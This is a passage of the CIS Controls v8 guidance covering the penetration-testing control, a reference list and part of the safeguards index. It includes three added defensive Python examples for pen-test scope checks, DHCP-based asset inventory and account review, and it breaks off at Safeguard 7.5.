Penetration testing starts with reconnaissance of the enterprise and its environment, and scanning to identify the vulnerabilities that can be used as entry points into the enterprise. It is important to make sure that all in-scope enterprise assets are discovered, rather than relying on a static list, which might be outdated or incomplete. Next, vulnerabilities are identified in these targets. Exploits for these vulnerabilities are then executed to demonstrate specifically how an adversary can either subvert the enterprise’s security goals (e.g., the protection of specific sensitive data) or achieve specific adversarial objectives (e.g., the establishment of a covert Command and Control (C2) infrastructure). The results provide deeper insight, through demonstration, into the business risks of the various vulnerabilities. Testing can be directed against physical access controls or the network, system, or application layers, and often includes social engineering components.

Penetration tests are expensive, complex, and potentially introduce their own risks. Experienced people from reputable vendors must conduct them. Some of the risks include unexpected shutdown of systems that might be unstable, exploits that might delete or corrupt data or configurations, and the testing report itself, which needs to be protected because it gives step-by-step instructions on how to break into the enterprise and target critical assets or data.

Each enterprise should define a clear scope and rules of engagement for penetration testing. The scope of such projects should include, at a minimum, the enterprise assets with the highest-value information and production processing functionality. Other lower-value systems may also be tested to see if they can be used as pivot points to compromise higher-value targets. The rules of engagement for penetration test analyses should describe, at a minimum, times of day for testing, duration of test(s), and the overall test approach. Only a few people in the enterprise should know when a penetration test is performed, and a primary point of contact in the enterprise should be designated in case problems occur. Increasingly, enterprises have penetration tests conducted through third-party legal counsel to protect the penetration test report from disclosure.
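The discovery-versus-static-list check and the rules-of-engagement time window described above, as an added example that is not part of the CIS Controls document: a small Python script that reconciles discovery results against the authorized scope and the client's static asset list, so that out-of-scope hosts are never targeted, stale entries are reported, and newly found in-scope hosts are added. The networks, addresses, host names, testing window and discovery output are constructed sample data, and the nmap-style greppable line format is an assumption.

```python
"""Reconcile penetration-test discovery results with the authorized scope and
the rules of engagement. Added example, not CIS Controls text; every network,
host, and window below is constructed sample data."""
import ipaddress
from datetime import time

# Constructed rules of engagement: authorized networks, an explicit carve-out,
# and a nightly testing window that wraps midnight (22:00 to 06:00 local).
SCOPE_NETWORKS = [ipaddress.ip_network("10.20.0.0/24"),
                  ipaddress.ip_network("203.0.113.0/28")]
EXCLUDED_HOSTS = {ipaddress.ip_address("10.20.0.250")}   # fragile OT gateway, out of scope
TEST_WINDOW = (time(22, 0), time(6, 0))

# Static asset list supplied by the client; it may be stale or incomplete.
STATIC_ASSET_LIST = {"10.20.0.10", "10.20.0.11", "10.20.0.12", "203.0.113.5"}

# Constructed discovery output in the greppable style of `nmap -sn -oG -`
# (assumed format; adapt the parser to whatever your discovery tool emits).
DISCOVERY_OUTPUT = """\
Host: 10.20.0.10 ()\tStatus: Up
Host: 10.20.0.11 ()\tStatus: Up
Host: 10.20.0.37 (build-agent)\tStatus: Up
Host: 10.20.0.250 (plc-gw)\tStatus: Up
Host: 10.20.1.4 ()\tStatus: Up
Host: 203.0.113.5 (www)\tStatus: Up
Host: 203.0.113.9 ()\tStatus: Down
"""


def parse_discovery(text):
    """Return the addresses of hosts that answered, in discovery order."""
    hosts = []
    for line in text.splitlines():
        if line.startswith("Host:") and "Status: Up" in line:
            hosts.append(ipaddress.ip_address(line.split()[1]))
    return hosts


def in_scope(ip, networks=SCOPE_NETWORKS, excluded=EXCLUDED_HOSTS):
    """A host is a valid target only if it lies in an authorized network and
    is not explicitly carved out; carve-outs win over network membership."""
    return ip not in excluded and any(ip in net for net in networks)


def reconcile(discovered, static_list=STATIC_ASSET_LIST):
    """Split discovered hosts into targets and out-of-scope hosts, then compare
    the targets with the static list: 'stale' entries never answered, 'new'
    hosts are in scope but missing from the list the client handed over."""
    targets = sorted(str(ip) for ip in discovered if in_scope(ip))
    out_of_scope = sorted(str(ip) for ip in discovered if not in_scope(ip))
    seen = {str(ip) for ip in discovered}
    return {
        "targets": targets,
        "out_of_scope": out_of_scope,           # never touch these
        "stale": sorted(static_list - seen),
        "new": sorted(set(targets) - static_list),
    }


def allowed_at(hhmm, window=TEST_WINDOW):
    """True if the clock time 'HH:MM' falls inside the agreed window. A window
    whose start is later than its end is treated as crossing midnight."""
    start, end = window
    t = time.fromisoformat(hhmm)
    if start <= end:
        return start <= t < end
    return t >= start or t < end


if __name__ == "__main__":
    for key, hosts in reconcile(parse_discovery(DISCOVERY_OUTPUT)).items():
        print(f"{key:13s} {', '.join(hosts) or '-'}")
    for clock in ("23:30", "05:59", "06:00", "14:00"):
        print(clock, "testing allowed" if allowed_at(clock) else "outside window")
```

The carve-out is checked before network membership on purpose: an excluded host inside an authorized range is the common way a tester ends up touching a system the rules of engagement forbade. The "new" list is the finding the text warns about, an in-scope host the static list did not know existed.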

The Safeguards in this CIS Control provide specific, high-priority steps that can improve enterprise security, and should be a part of any penetration testing program. In addition, we recommend the use of some of the excellent comprehensive resources dedicated to this topic to support security test planning, management, and reporting:

→ OWASP Penetration Testing Methodologies – https://www.owasp.org/index.php/Penetration_testing_methodologies
→ PCI Security Standards Council – https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf

Safeguards
Each Safeguard below lists, in parentheses, its asset type, its security function, and the Implementation Groups (IG1, IG2, IG3) to which it applies.

18.1 Establish and Maintain a Penetration Testing Program (N/A; Identify; IG2, IG3)
Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.

18.2 Perform Periodic External Penetration Tests (Network; Identify; IG2, IG3)
Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.

18.3 Remediate Penetration Test Findings (Network; Protect; IG2, IG3)
Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.

18.4 Validate Security Measures (Network; Protect; IG3)
Validate security measures after each penetration test. If deemed necessary, modify rulesets and capabilities to detect the techniques used during testing.

18.5 Perform Periodic Internal Penetration Tests (N/A; Identify; IG3)
Perform periodic internal penetration tests based on program requirements, no less than annually. The testing may be clear box or opaque box.

Appendix A

Resources and References

CIS Benchmarks™ – http://www.cisecurity.org/cis-benchmarks/
CIS Controls Cloud Companion Guide – https://www.cisecurity.org/controls/v8/
CIS Community Defense Model (CDM) – https://www.cisecurity.org/controls/v8/
CIS Configuration Assessment Tool (CIS-CAT®) – https://learn.cisecurity.org/cis-cat/
CIS Controls Assessment Specification – https://controls-assessment-specification.readthedocs.io/en/latest/
CIS Controls Implementation Groups – https://www.cisecurity.org/controls/v8/
CIS Controls Industrial Control Systems Implementation Guide – https://www.cisecurity.org/controls/v8/
CIS Controls Internet of Things Companion Guide – https://www.cisecurity.org/controls/v8/
CIS Controls Mobile Companion Guide – https://www.cisecurity.org/controls/v8/
CIS Controls Self Assessment Tool (CSAT) – https://www.cisecurity.org/controls/cis-controls-self-assessment-tool-cis-csat/
CIS Controls Telework and Small Office Network Security Guide – https://www.cisecurity.org/white-papers/cis-controls-telework-and-small-office-network-security-guide/
CIS Password Policy Guide – https://www.cisecurity.org/white-papers/cis-password-policy-guide/
CIS Risk Assessment Method (RAM) – https://www.cisecurity.org/controls/v8/
Cloud Security Alliance (CSA) – https://cloudsecurityalliance.org/
Council of Registered Security Testers (CREST) Cyber Security Incident Response Guide – CREST provides guidance, standards, and knowledge on a wide variety of cyber defense topics. https://www.crest-approved.org/wp-content/uploads/2014/11/CSIRProcurement-Guide.pdf
EDUCAUSE – https://www.educause.edu/focus-areas-and-initiatives/policy-and-security/cybersecurity-program/awareness-campaigns
International Organization for Standardization – https://www.iso.org/home.html
National Cyber Security Alliance (NCSA) – https://staysafeonline.org/
National Cyber Security Centre (U.K.) – https://www.ncsc.gov.uk/guidance/10-steps-user-education-and-awareness
National Institute of Standards and Technology (NIST®) – https://www.nist.gov/
National Institute of Standards and Technology (NIST®) SSDF – https://csrc.nist.gov/News/2020/mitigating-risk-of-software-vulns-ssdf
National Institute of Standards and Technology (NIST®) National Checklist Program Repository – https://nvd.nist.gov/ncp/repository
National Institute of Standards and Technology (NIST®) Digital Identity Guidelines – https://pages.nist.gov/800-63-3/
National Institute of Standards and Technology (NIST®) FIPS 140-2 – https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf
National Institute of Standards and Technology (NIST®) FIPS 140-3 – https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-3.pdf
National Institute of Standards and Technology (NIST®) SP 800-50 Infosec Awareness Training – https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-50.pdf
National Institute of Standards and Technology (NIST®) SP 800-88r1 Guidelines for Media Sanitization – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf
National Institute of Standards and Technology (NIST®) SP 800-126r3 The Technical Specification for the Security Content Automation Protocol (SCAP) – https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-126r3.pdf
OWASP® – https://owasp.org/
OWASP® Penetration Testing Methodologies – https://www.owasp.org/index.php/Penetration_testing_methodologies
PCI Security Standards Council – https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf
SAFECode Application Security Addendum – https://safecode.org/cis-controls/
SANS – https://www.sans.org/security-awareness-training/resources
The Software Alliance – https://www.bsa.org/reports/updated-bsa-framework-for-secure-software
Verizon Data Breach Investigations Report – https://enterprise.verizon.com/resources/reports/2020-data-breach-investigations-report.pdf
Appendix B
Controls and Safeguards Index

Each entry below gives the Safeguard number and title, followed in parentheses by its asset type, its security function, and the Implementation Groups (IG1, IG2, IG3) to which it applies.

01 Inventory and Control of Enterprise Assets
Actively manage (inventory, track, and correct) all enterprise assets (end-user devices, including portable and mobile; network devices; non-computing/Internet of Things (IoT) devices; and servers) connected to the infrastructure physically, virtually, remotely, and those within cloud environments, to accurately know the totality of assets that need to be monitored and protected within the enterprise. This will also support identifying unauthorized and unmanaged assets to remove or remediate.

1.1 Establish and Maintain Detailed Enterprise Asset Inventory (Devices; Identify; IG1, IG2, IG3)
Establish and maintain an accurate, detailed, and up-to-date inventory of all enterprise assets with the potential to store or process data, to include: end-user devices (including portable and mobile), network devices, non-computing/IoT devices, and servers. Ensure the inventory records the network address (if static), hardware address, machine name, data asset owner, department for each asset, and whether the asset has been approved to connect to the network. For mobile end-user devices, MDM type tools can support this process, where appropriate. This inventory includes assets connected to the infrastructure physically, virtually, remotely, and those within cloud environments. Additionally, it includes assets that are regularly connected to the enterprise’s network infrastructure, even if they are not under control of the enterprise. Review and update the inventory of all enterprise assets bi-annually, or more frequently.

1.2 Address Unauthorized Assets (Devices; Respond; IG1, IG2, IG3)
Ensure that a process exists to address unauthorized assets on a weekly basis. The enterprise may choose to remove the asset from the network, deny the asset from connecting remotely to the network, or quarantine the asset.

1.3 Utilize an Active Discovery Tool (Devices; Detect; IG2, IG3)
Utilize an active discovery tool to identify assets connected to the enterprise’s network. Configure the active discovery tool to execute daily, or more frequently.

1.4 Use Dynamic Host Configuration Protocol (DHCP) Logging to Update Enterprise Asset Inventory (Devices; Identify; IG2, IG3)
Use DHCP logging on all DHCP servers or Internet Protocol (IP) address management tools to update the enterprise’s asset inventory. Review and use logs to update the enterprise’s asset inventory weekly, or more frequently.

1.5 Use a Passive Asset Discovery Tool (Devices; Detect; IG3)
Use a passive discovery tool to identify assets connected to the enterprise’s network. Review and use scans to update the enterprise’s asset inventory at least weekly, or more frequently.

CIS Controls v8 Appendix B: Controls and Safeguards Index Page B1
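Safeguards 1.1, 1.2 and 1.4 together, as an added example that is not part of the CIS Controls document: a Python routine that reads DHCP server log lines, updates an inventory keyed by hardware address with the fields Safeguard 1.1 calls for, and returns the devices that need the Safeguard 1.2 process because they are either unknown or not yet approved to connect. The inventory and the log lines are constructed sample data; the line format is modelled on ISC dhcpd syslog output, which is an assumption about your DHCP server.

```python
"""Update an enterprise asset inventory from DHCP server logs (Safeguards 1.1,
1.2 and 1.4). Added example, not CIS Controls text; the inventory and the
syslog lines are constructed, and the line format is modelled on ISC dhcpd."""
import re

# Inventory keyed by hardware (MAC) address, carrying the Safeguard 1.1 fields.
# Constructed sample data: one approved server, one device awaiting approval.
INVENTORY = {
    "3c:52:82:00:00:10": {"name": "fileserver", "owner": "J. Ops", "department": "IT",
                          "approved": True, "ip": "10.20.0.10", "last_seen": None},
    "3c:52:82:aa:bb:01": {"name": "build-agent", "owner": "CI team", "department": "Eng",
                          "approved": False, "ip": None, "last_seen": None},
}

# Constructed dhcpd syslog lines; only a DHCPACK records a completed lease,
# so DISCOVER/OFFER/REQUEST lines are ignored.
DHCP_LOG = """\
May  3 10:15:02 dhcp1 dhcpd[1234]: DHCPDISCOVER from 3c:52:82:aa:bb:01 via eth0
May  3 10:15:03 dhcp1 dhcpd[1234]: DHCPACK on 10.20.0.37 to 3c:52:82:aa:bb:01 (build-agent) via eth0
May  3 10:16:44 dhcp1 dhcpd[1234]: DHCPACK on 10.20.0.88 to 00:1a:2b:cc:dd:ee via eth0
May  3 10:20:00 dhcp1 dhcpd[1234]: DHCPACK on 10.20.0.10 to 3c:52:82:00:00:10 (fileserver) via eth0
May  3 10:21:30 dhcp1 dhcpd[1234]: DHCPACK on 10.20.0.37 to 3c:52:82:aa:bb:01 (build-agent) via eth0
"""

# The client hostname in parentheses is optional: many devices do not send one.
ACK_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dhcpd\[\d+\]: DHCPACK on (?P<ip>\S+) "
    r"to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})(?: \((?P<host>[^)]*)\))? via \S+$"
)


def parse_acks(log):
    """Yield (timestamp, ip, mac, hostname) for each completed lease."""
    for line in log.splitlines():
        m = ACK_RE.match(line)
        if m:
            yield m["ts"], m["ip"], m["mac"].lower(), m["host"] or ""


def update_inventory(inventory, log):
    """Apply leases to the inventory in place and return the hardware addresses
    that need the Safeguard 1.2 process: unknown devices, which are added as
    unapproved placeholders, and known devices not yet approved to connect."""
    unauthorized = []
    for ts, ip, mac, host in parse_acks(log):
        entry = inventory.get(mac)
        if entry is None:
            entry = inventory[mac] = {"name": host or "unknown", "owner": None,
                                      "department": None, "approved": False,
                                      "ip": None, "last_seen": None}
        entry["ip"], entry["last_seen"] = ip, ts
        if host and entry["name"] == "unknown":
            entry["name"] = host
        if not entry["approved"] and mac not in unauthorized:
            unauthorized.append(mac)
    return unauthorized


if __name__ == "__main__":
    for mac in update_inventory(INVENTORY, DHCP_LOG):
        e = INVENTORY[mac]
        print(f"unauthorized: {mac} {e['name']} at {e['ip']} (seen {e['last_seen']})")
```

Keying on the hardware address rather than the IP matters because DHCP reassigns addresses: the same device reappears under a new lease but the same MAC, so its inventory record is updated rather than duplicated. MAC addresses can be spoofed, which is why this feeds the inventory review rather than replacing it.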

02 Inventory and Control of Software Assets
Actively manage (inventory, track, and correct) all software (operating systems and applications) on the network so that only authorized software is installed and can execute, and that unauthorized and unmanaged software is found and prevented from installation or execution.

2.1 Establish and Maintain a Software Inventory (Applications; Identify; IG1, IG2, IG3)
Establish and maintain a detailed inventory of all licensed software installed on enterprise assets. The software inventory must document the title, publisher, initial install/use date, and business purpose for each entry; where appropriate, include the Uniform Resource Locator (URL), app store(s), version(s), deployment mechanism, and decommission date. Review and update the software inventory bi-annually, or more frequently.

2.2 Ensure Authorized Software is Currently Supported (Applications; Identify; IG1, IG2, IG3)
Ensure that only currently supported software is designated as authorized in the software inventory for enterprise assets. If software is unsupported, yet necessary for the fulfillment of the enterprise’s mission, document an exception detailing mitigating controls and residual risk acceptance. For any unsupported software without exception documentation, designate as unauthorized. Review the software list to verify software support at least monthly, or more frequently.

2.3 Address Unauthorized Software (Applications; Respond; IG1, IG2, IG3)
Ensure that unauthorized software is either removed from use on enterprise assets or receives a documented exception. Review monthly, or more frequently.

2.4 Utilize Automated Software Inventory Tools (Applications; Detect; IG2, IG3)
Utilize software inventory tools, when possible, throughout the enterprise to automate the discovery and documentation of installed software.

2.5 Allowlist Authorized Software (Applications; Protect; IG2, IG3)
Use technical controls, such as application allowlisting, to ensure that only authorized software can execute or be accessed. Reassess bi-annually, or more frequently.

2.6 Allowlist Authorized Libraries (Applications; Protect; IG3)
Use technical controls to ensure that only authorized software libraries, such as specific .dll, .ocx, .so, etc., files, are allowed to load into a system process. Block unauthorized libraries from loading into a system process. Reassess bi-annually, or more frequently.

2.7 Allowlist Authorized Scripts (Applications; Protect; IG3)
Use technical controls, such as digital signatures and version control, to ensure that only authorized scripts, such as specific … files, are allowed to execute. Block unauthorized scripts from executing. Reassess bi-annually, or more frequently.

03 Data Protection
Develop processes and technical controls to identify, classify, securely handle, retain, and dispose of data.

3.1 Establish and Maintain a Data Management Process (Data; Identify; IG1, IG2, IG3)
Establish and maintain a data management process. In the process, address data sensitivity, data owner, handling of data, data retention limits, and disposal requirements, based on sensitivity and retention standards for the enterprise. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

3.2 Establish and Maintain a Data Inventory (Data; Identify; IG1, IG2, IG3)
Establish and maintain a data inventory, based on the enterprise’s data management process. Inventory sensitive data, at a minimum. Review and update inventory annually, at a minimum, with a priority on sensitive data.

3.3 Configure Data Access Control Lists (Data; Protect; IG1, IG2, IG3)
Configure data access control lists based on a user’s need to know. Apply data access control lists, also known as access permissions, to local and remote file systems, databases, and applications.

3.4 Enforce Data Retention (Data; Protect; IG1, IG2, IG3)
Retain data according to the enterprise’s data management process. Data retention must include both minimum and maximum timelines.

3.5 Securely Dispose of Data (Data; Protect; IG1, IG2, IG3)
Securely dispose of data as outlined in the enterprise’s data management process. Ensure the disposal process and method are commensurate with the data sensitivity.

3.6 Encrypt Data on End-User Devices (Devices; Protect; IG1, IG2, IG3)
Encrypt data on end-user devices containing sensitive data. Example implementations can include: Windows BitLocker®, Apple FileVault®, Linux® dm-crypt.

3.7 Establish and Maintain a Data Classification Scheme (Data; Identify; IG2, IG3)
Establish and maintain an overall data classification scheme for the enterprise. Enterprises may use labels, such as “Sensitive,” “Confidential,” and “Public,” and classify their data according to those labels. Review and update the classification scheme annually, or when significant enterprise changes occur that could impact this Safeguard.

3.8 Document Data Flows (Data; Identify; IG2, IG3)
Document data flows. Data flow documentation includes service provider data flows and should be based on the enterprise’s data management process. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

3.10 Encrypt Sensitive Data in Transit (Data; Protect; IG2, IG3)
Encrypt sensitive data in transit. Example implementations can include: Transport Layer Security (TLS) and Open Secure Shell (OpenSSH).

3.11 Encrypt Sensitive Data at Rest (Data; Protect; IG2, IG3)
Encrypt sensitive data at rest on servers, applications, and databases containing sensitive data. Storage-layer encryption, also known as server-side encryption, meets the minimum requirement of this Safeguard. Additional encryption methods may include application-layer encryption, also known as client-side encryption, where access to the data storage device(s) does not permit access to the plain-text data.

3.12 Segment Data Processing and Storage Based on Sensitivity (Network; Protect; IG2, IG3)
Segment data processing and storage based on the sensitivity of the data. Do not process sensitive data on enterprise assets intended for lower sensitivity data.

3.13 Deploy a Data Loss Prevention Solution (Data; Protect; IG3)
Implement an automated tool, such as a host-based Data Loss Prevention (DLP) tool, to identify all sensitive data stored, processed, or transmitted through enterprise assets, including those located onsite or at a remote service provider, and update the enterprise’s sensitive data inventory.

3.14 Log Sensitive Data Access (Data; Detect; IG3)
Log sensitive data access, including modification and disposal.

04 Secure Configuration of Enterprise Assets and Software
Establish and maintain the secure configuration of enterprise assets (end-user devices, including portable and mobile; network devices; non-computing/IoT devices; and servers) and software (operating systems and applications).

4.1 Establish and Maintain a Secure Configuration Process (Applications; Protect; IG1, IG2, IG3)
Establish and maintain a secure configuration process for enterprise assets (end-user devices, including portable and mobile, non-computing/IoT devices, and servers) and software (operating systems and applications). Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

4.2 Establish and Maintain a Secure Configuration Process for Network Infrastructure (Network; Protect; IG1, IG2, IG3)
Establish and maintain a secure configuration process for network devices. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

4.3 Configure Automatic Session Locking on Enterprise Assets (Users; Protect; IG1, IG2, IG3)
Configure automatic session locking on enterprise assets after a defined period of inactivity. For general purpose operating systems, the period must not exceed 15 minutes. For mobile end-user devices, the period must not exceed 2 minutes.

4.4 Implement and Manage a Firewall on Servers (Devices; Protect; IG1, IG2, IG3)
Implement and manage a firewall on servers, where supported. Example implementations include a virtual firewall, operating system firewall, or a third-party firewall agent.

4.5 Implement and Manage a Firewall on End-User Devices (Devices; Protect; IG1, IG2, IG3)
Implement and manage a host-based firewall or port-filtering tool on end-user devices, with a default-deny rule that drops all traffic except those services and ports that are explicitly allowed.

4.6 Securely Manage Enterprise Assets and Software (Network; Protect; IG1, IG2, IG3)
Securely manage enterprise assets and software. Example implementations include managing configuration through version-controlled infrastructure-as-code and accessing administrative interfaces over secure network protocols, such as Secure Shell (SSH) and Hypertext Transfer Protocol Secure (HTTPS). Do not use insecure management protocols, such as Telnet (Teletype Network) and HTTP, unless operationally essential.

4.7 Manage Default Accounts on Enterprise Assets and Software (Users; Protect; IG1, IG2, IG3)
Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.

4.8 Uninstall or Disable Unnecessary Services on Enterprise Assets and Software (Devices; Protect; IG2, IG3)
Uninstall or disable unnecessary services on enterprise assets and software, such as an unused file sharing service, web application module, or service function.

4.9 Configure Trusted DNS Servers on Enterprise Assets (Devices; Protect; IG2, IG3)
Configure trusted DNS servers on enterprise assets. Example implementations include: configuring assets to use enterprise-controlled DNS servers and/or reputable externally accessible DNS servers.

4.10 Enforce Automatic Device Lockout on Portable End-User Devices (Devices; Respond; IG2, IG3)
Enforce automatic device lockout following a predetermined threshold of local failed authentication attempts on portable end-user devices, where supported. For laptops, do not allow more than 20 failed authentication attempts; for tablets and smartphones, no more than 10 failed authentication attempts. Example implementations include Microsoft® InTune Device Lock and Apple® Configuration Profile maxFailedAttempts.

4.11 Enforce Remote Wipe Capability on Portable End-User Devices (Devices; Protect; IG2, IG3)
Remotely wipe enterprise data from enterprise-owned portable end-user devices when deemed appropriate, such as for lost or stolen devices, or when an individual no longer supports the enterprise.

4.12 Separate Enterprise Workspaces on Mobile End-User Devices (Devices; Protect; IG3)
Ensure separate enterprise workspaces are used on mobile end-user devices, where supported. Example implementations include using an Apple® Configuration Profile or Android™ Work Profile to separate enterprise applications and data from personal applications and data.

05 Account Management
Use processes and tools to assign and manage authorization to credentials for user accounts, including administrator accounts, as well as service accounts, to enterprise assets and software.

5.1 Establish and Maintain an Inventory of Accounts (Users; Identify; IG1, IG2, IG3)
Establish and maintain an inventory of all accounts managed in the enterprise. The inventory must include both user and administrator accounts. The inventory, at a minimum, should contain the person’s name, username, start/stop dates, and department. Validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.

5.2 Use Unique Passwords (Users; Protect; IG1, IG2, IG3)
Use unique passwords for all enterprise assets. Best practice implementation includes, at a minimum, an 8-character password for accounts using MFA and a 14-character password for accounts not using MFA.

5.3 Disable Dormant Accounts (Users; Respond; IG1, IG2, IG3)
Delete or disable any dormant accounts after a period of 45 days of inactivity, where supported.

5.4 Restrict Administrator Privileges to Dedicated Administrator Accounts (Users; Protect; IG1, IG2, IG3)
Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.

5.5 Establish and Maintain an Inventory of Service Accounts (Users; Identify; IG2, IG3)
Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose. Perform service account reviews to validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.

5.6 Centralize Account Management (Users; Protect; IG2, IG3)
Centralize account management through a directory or identity service.
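Safeguards 5.1, 5.2, 5.3 and 5.5 applied together in one quarterly review, as an added example that is not part of the CIS Controls document: a Python check over an account inventory that reports missing inventory fields, passwords shorter than the 8/14-character minimum depending on MFA, service accounts whose review is older than a quarter, and accounts dormant for more than 45 days. The account records, field names and review date are constructed sample data; the "never logged in" rule, which measures dormancy from the start date, is a design choice of this example rather than text from the Safeguards.

```python
"""Quarterly account review for Control 05 (Safeguards 5.1, 5.2, 5.3, 5.5).
Added example, not CIS Controls text; the records and the review date are
constructed sample data."""
from datetime import date

DORMANT_DAYS = 45                        # Safeguard 5.3
MIN_PW_LEN = {True: 8, False: 14}        # Safeguard 5.2, keyed by "MFA in use"
SERVICE_REVIEW_DAYS = 90                 # Safeguard 5.5, quarterly review
REVIEW_DATE = date(2024, 5, 1)           # constructed "today"

# Constructed inventory rows. last_login is None for an account that never
# logged in; service accounts carry the Safeguard 5.5 fields instead.
ACCOUNTS = [
    {"user": "asmith", "name": "A. Smith", "department": "Finance", "start": date(2023, 1, 9),
     "stop": None, "last_login": date(2024, 4, 29), "mfa": True, "pw_len": 10, "enabled": True},
    {"user": "bjones", "name": "B. Jones", "department": "Sales", "start": date(2022, 6, 1),
     "stop": None, "last_login": date(2024, 2, 10), "mfa": False, "pw_len": 12, "enabled": True},
    {"user": "contractor7", "name": "", "department": "", "start": date(2024, 3, 1),
     "stop": None, "last_login": None, "mfa": False, "pw_len": 16, "enabled": True},
    {"user": "dlee", "name": "D. Lee", "department": "HR", "start": date(2021, 3, 3),
     "stop": date(2024, 1, 31), "last_login": date(2024, 1, 30), "mfa": True, "pw_len": 9,
     "enabled": False},
    {"user": "svc-backup", "service": True, "owner": "IT", "review_date": date(2023, 10, 1),
     "purpose": "nightly backups", "last_login": date(2024, 4, 30), "mfa": False,
     "pw_len": 32, "enabled": True},
]


def review_accounts(accounts, today=REVIEW_DATE):
    """Return {username: [findings]} for every enabled account needing action."""
    findings = {}
    for a in accounts:
        if not a["enabled"]:
            continue                      # already disabled; nothing to act on
        issues = []
        if a.get("service"):
            # 5.5: owner, review date and purpose must be recorded, and the
            # last review must fall within the quarter.
            for field in ("owner", "review_date", "purpose"):
                if not a.get(field):
                    issues.append(f"missing {field}")
            if a.get("review_date") and (today - a["review_date"]).days > SERVICE_REVIEW_DAYS:
                issues.append("service account review overdue")
        else:
            # 5.1: name, username, start/stop dates and department.
            for field in ("name", "department", "start"):
                if not a.get(field):
                    issues.append(f"missing {field}")
        # 5.2: the minimum length depends on whether MFA protects the account.
        if a["pw_len"] < MIN_PW_LEN[a["mfa"]]:
            issues.append(f"password shorter than {MIN_PW_LEN[a['mfa']]} chars")
        # 5.3: dormant after 45 days without a login. An account that never
        # logged in is measured from its start date so it cannot hide as
        # "unknown" (example design choice).
        last_activity = a["last_login"] or a.get("start") or a.get("review_date")
        if last_activity and (today - last_activity).days > DORMANT_DAYS:
            issues.append("dormant: disable or delete")
        if issues:
            findings[a["user"]] = issues
    return findings


if __name__ == "__main__":
    for user, issues in review_accounts(ACCOUNTS).items():
        print(f"{user}: {'; '.join(issues)}")
```

The check skips disabled accounts rather than deleting them, matching Safeguard 6.2's note that disabling, not deleting, preserves audit trails. Accounts with no login at all are the ones most often missed by a naive "last login older than 45 days" query, because their last-login field is empty rather than old.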


06 Access Control Management
Use processes and tools to create, assign, manage, and revoke access credentials and privileges for user, administrator, and service accounts for enterprise assets and software.

6.1 Establish an Access Granting Process (Users; Protect; IG1, IG2, IG3)
Establish and follow a process, preferably automated, for granting access to enterprise assets upon new hire, rights grant, or role change of a user.

6.2 Establish an Access Revoking Process (Users; Protect; IG1, IG2, IG3)
Establish and follow a process, preferably automated, for revoking access to enterprise assets, through disabling accounts immediately upon termination, rights revocation, or role change of a user. Disabling accounts, instead of deleting accounts, may be necessary to preserve audit trails.

6.3 Require MFA for Externally-Exposed Applications (Users; Protect; IG1, IG2, IG3)
Require all externally-exposed enterprise or third-party applications to enforce MFA, where supported. Enforcing MFA through a directory service or SSO provider is a satisfactory implementation of this Safeguard.

6.4 Require MFA for Remote Network Access (Users; Protect; IG1, IG2, IG3)
Require MFA for remote network access.

6.5 Require MFA for Administrative Access (Users; Protect; IG1, IG2, IG3)
Require MFA for all administrative access accounts, where supported, on all enterprise assets, whether managed on-site or through a third-party provider.

6.6 Establish and Maintain an Inventory of Authentication and Authorization Systems (Users; Identify; IG2, IG3)
Establish and maintain an inventory of the enterprise’s authentication and authorization systems, including those hosted on-site or at a remote service provider. Review and update the inventory, at a minimum, annually, or more frequently.

6.7 Centralize Access Control (Users; Protect; IG2, IG3)
Centralize access control for all enterprise assets through a directory service or SSO provider, where supported.

6.8 Define and Maintain Role-Based Access Control (Data; Protect; IG3)
Define and maintain role-based access control, through determining and documenting the access rights necessary for each role within the enterprise to successfully carry out its assigned duties. Perform access control reviews of enterprise assets to validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.

07 Continuous Vulnerability Management
Develop a plan to continuously assess and track vulnerabilities on all enterprise assets within the enterprise’s infrastructure, in order to remediate, and minimize, the window of opportunity for attackers. Monitor public and private industry sources for new threat and vulnerability information.

7.1 Establish and Maintain a Vulnerability Management Process (Applications; Protect; IG1, IG2, IG3)
Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.

7.2 Establish and Maintain a Remediation Process (Applications; Respond; IG1, IG2, IG3)
Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.

7.3 Perform Automated Operating System Patch Management (Applications; Protect; IG1, IG2, IG3)
Perform operating system updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.

7.4 Perform Automated Application Patch Management (Applications; Protect; IG1, IG2, IG3)
Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.

7.5 Perform Automated Vulnerability Scans of Internal Enterprise Assets (Applications; Identify; IG2, IG3)
